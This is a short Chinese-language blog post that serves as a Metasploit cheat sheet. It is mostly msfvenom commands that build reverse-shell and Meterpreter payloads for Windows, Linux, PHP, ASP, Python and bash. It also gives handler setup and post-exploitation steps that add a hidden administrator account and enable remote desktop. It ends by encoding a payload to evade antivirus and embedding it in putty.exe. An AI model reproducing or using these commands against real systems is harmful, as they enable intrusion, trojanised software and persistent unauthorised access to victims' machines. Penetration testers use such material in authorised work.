Msfvenom是有效负载生成和编码的组合。
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell |
1 | msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c |
1 | msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py |
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp |
1 | msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh |
1 | msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw -o shell.php |
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe |
1 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe |
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=本机IP -f exe >/home/shell.exe |
123456 | use exploit/multi/handler //设置模块set payload windows/meterpreter/reverse_tcp //配置payloadshow options //显示选项set LHOST 本机IP //设置ip地址,注意,这个要与上面攻击载荷里面的相同set LPORT 端口 //设置端口,这个也要相同exploit //执行攻击 |
1234567 | shell //进入终端net user //查看用户net user admin admin /add //创建一个admin用户net localgroup administrators admin /add //提权net user admin //admin用户的信息exit //退出bash终端run getgui -e //开启3389端口 |
1234 | 开启远程桌面run post/windows/manage/enable_rdp连接rdesktop -u 用户名 -p 密码 |
1 | msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe |
1 | msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe |
来源:博客园
作者:十三s
链接:https://www.cnblogs.com/ihacker/p/11420661.html
